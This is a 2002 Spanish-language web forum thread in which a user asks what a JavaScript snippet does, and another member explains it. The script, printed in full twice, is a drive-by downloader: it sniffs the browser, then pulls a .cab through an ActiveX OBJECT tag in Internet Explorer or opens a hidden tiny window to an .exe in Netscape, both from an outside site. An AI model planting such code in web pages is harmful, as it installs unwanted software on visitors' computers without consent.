Foros del Web » Creando para Internet » HTML »

este codigo ke es?

Estas en el tema de este codigo ke es? en el foro de HTML en Foros del Web. Código: <SCRIPT language=JavaScript> <!-- var baseURL = ""; var fnPrefix = "http://www.petardas.com/ya-videochat-porno1es"; function WhichBrowser() { BrowserName = navigator.appName; BrowserVersion = parseInt(navigator.appVersion); Browser = "NS"; if ...
  #1 (permalink)  
Antiguo 17/07/2002, 13:17
Avatar de camposi  
Fecha de Ingreso: enero-2002
Mensajes: 104
Antigüedad: 15 años, 10 meses
Puntos: 0
este codigo ke es?

Código:
 
<SCRIPT language=JavaScript>
<!-- 
var baseURL = "";
var fnPrefix = "http://www.petardas.com/ya-videochat-porno1es";

function WhichBrowser()
{
BrowserName = navigator.appName;
BrowserVersion = parseInt(navigator.appVersion);

Browser = "NS";
if ((BrowserName == "Netscape") && (BrowserVersion == "3"))
Browser = "NC3";
else if ((BrowserName == "Netscape") && (BrowserVersion == "4"))
Browser = "NC4";
else if (BrowserName == "Microsoft Internet Explorer")
Browser = "IE";
return Browser;
}
function ncDownload() {
window.open("http://www.petardas.com/petardas.exe","_blank","height=1,width=1");
}

function IE_DownloadFile(ieURL)
{
document.write("<OBJECT");
document.write(" CLASSID =\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\"");
document.write(" CODEBASE=\""+ieURL+"\">");
document.write("<\/OBJECT>");
}

function cabexec()
{
if (WhichBrowser() == "IE") IE_DownloadFile(baseURL + fnPrefix + ".cab");
if (WhichBrowser() == "NC4") ncDownload();
}
cabexec();
//-->
</SCRIPT>
esto porejemplo
var fnPrefix = "http://www.petardas.com/ya-videochat-porno1es";
eske entra dentro de esa carpeta no?

mira este html cuando se ejecuta el solo se baja un programa y se ejecuta
y me pica la curiosidad de como cojone slo hacen.... ke de abujeros tiene el internet explorer profavor...

lo ke no entiendo eske crea carpetas y demas sera el exe el ke crea las carpetas?
bueno gracias haber si lo sacamos ke em pica la curiosidad... ;)

  #2 (permalink)  
Antiguo 17/07/2002, 13:41
Avatar de camposi  
Fecha de Ingreso: enero-2002
Mensajes: 104
Antigüedad: 15 años, 10 meses
Puntos: 0
Re: este codigo ke es?

Código:
 <SCRIPT language=JavaScript>
<!-- 
var baseURL = "";
var fnPrefix = "http://www.petardas.com/ya-videochat-porno1es";

function WhichBrowser()
{
BrowserName = navigator.appName;
BrowserVersion = parseInt(navigator.appVersion);

Browser = "NS";
if ((BrowserName == "Netscape") && (BrowserVersion == "3"))
Browser = "NC3";
else if ((BrowserName == "Netscape") && (BrowserVersion == "4"))
Browser = "NC4";
else if (BrowserName == "Microsoft Internet Explorer")
Browser = "IE";
return Browser;
}
function ncDownload() {
window.open("http://www.iespana.es/zonaoculta2/paco.fla","_blank","height=1,width=1");
}

function IE_DownloadFile(ieURL)
{
document.write("<OBJECT");
document.write(" CLASSID =\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\"");
document.write(" CODEBASE=\""+ieURL+"\">");
document.write("<\/OBJECT>");
}

function cabexec()
{
if (WhichBrowser() == "IE") IE_DownloadFile(baseURL + fnPrefix + ".cab");
if (WhichBrowser() == "NC4") ncDownload();
}
cabexec();
//-->
</SCRIPT>
mirad hehco este cambio y sigue ejecutando el exe de petardas.... eso si ke no lo comprendo....
voy hacer mas pruebas
  #3 (permalink)  
Antiguo 17/07/2002, 13:57
Avatar de .
.
 
Fecha de Ingreso: mayo-2002
Ubicación: Tampico
Mensajes: 906
Antigüedad: 15 años, 7 meses
Puntos: 1
Re: este codigo ke es?

bueno lo que hace ese scirpt es bajar un archivo executable para netscape y otro en formato *.cab (creo que es comprimido, no estoy seguro) para MSIE

si el navegador en MSIE
function IE_DownloadFile(ieURL)
{
document.write("<OBJECT");
document.write(" CLASSID =\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\"");
document.write(" CODEBASE=\""+ieURL+"\">&quo t;);
document.write("<\/OBJECT>");
}
entonces descomprime o ejecuta el archivo *.cab.

Si es Netscape solamente descarga el archivo executable
if (WhichBrowser() == "NC4") ncDownload();
http://www.petardas.com/petardas.exe


  #4 (permalink)  
Antiguo 17/07/2002, 14:00
Avatar de .
.
 
Fecha de Ingreso: mayo-2002
Ubicación: Tampico
Mensajes: 906
Antigüedad: 15 años, 7 meses
Puntos: 1
Re: este codigo ke es?

supongo que tienes el navegador de microsoft, por eso no viste el cambio en tu código, y te descargo el *.cab, ya que el cambio lo hiciste para Netscape
  #5 (permalink)  
Antiguo 17/07/2002, 15:49
Avatar de camposi  
Fecha de Ingreso: enero-2002
Mensajes: 104
Antigüedad: 15 años, 10 meses
Puntos: 0
Re: este codigo ke es?

mmmmmmmmmm ya voy pillando esto....
Código:
 function IE_DownloadFile(ieURL)
{
document.write("<OBJECT");
document.write(" CLASSID =\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\"");
document.write(" CODEBASE=\""+ieURL+"\">");
document.write("<\/OBJECT>");
}

esto decias ke hace bajarse el archivo , no? y descomprimirlo... pero no lo comprendo muy bien

mira
Código:
baseURL + fnPrefix + ".cab");
despues pone 
var fnPrefix = "http://www.petardas.com/ya-videochat-porno1es";
osea ke seria
http://www.petardas.com/ya-videochat-porno1es.cab
bueno gracias me as aclarado muchas cosas ;)
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 19:19.